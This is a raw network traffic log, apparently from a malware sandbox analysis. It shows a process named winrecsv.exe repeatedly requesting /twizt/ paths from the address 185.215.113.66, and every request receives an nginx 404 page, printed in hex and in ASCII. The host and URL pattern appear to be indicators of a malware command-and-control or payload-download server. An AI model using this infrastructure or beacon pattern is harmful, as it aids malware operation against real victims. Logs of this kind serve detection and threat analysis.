                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:47 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:48.278768063 CEST7315OUTGET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:48.336374044 CEST7318INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:48 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:49.350368023 CEST7375OUTGET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:49.407743931 CEST7376INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:49 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:50.423707008 CEST7558OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:50.484554052 CEST7559INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:50 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:51.508435011 CEST7560OUTGET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:51.565948963 CEST7565INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:51 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                12192.168.2.749842185.215.113.6680C:\Windows\winrecsv.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Aug 15, 2022 18:32:54.796464920 CEST7774OUTGET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:54.854403019 CEST7775INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:54 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:55.868633032 CEST7875OUTGET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:55.924823999 CEST7876INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:55 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:56.930187941 CEST7922OUTGET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:56.986433029 CEST7923INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:56 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:32:57.993880033 CEST8032OUTGET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:58.050360918 CEST8033INHTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:58 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
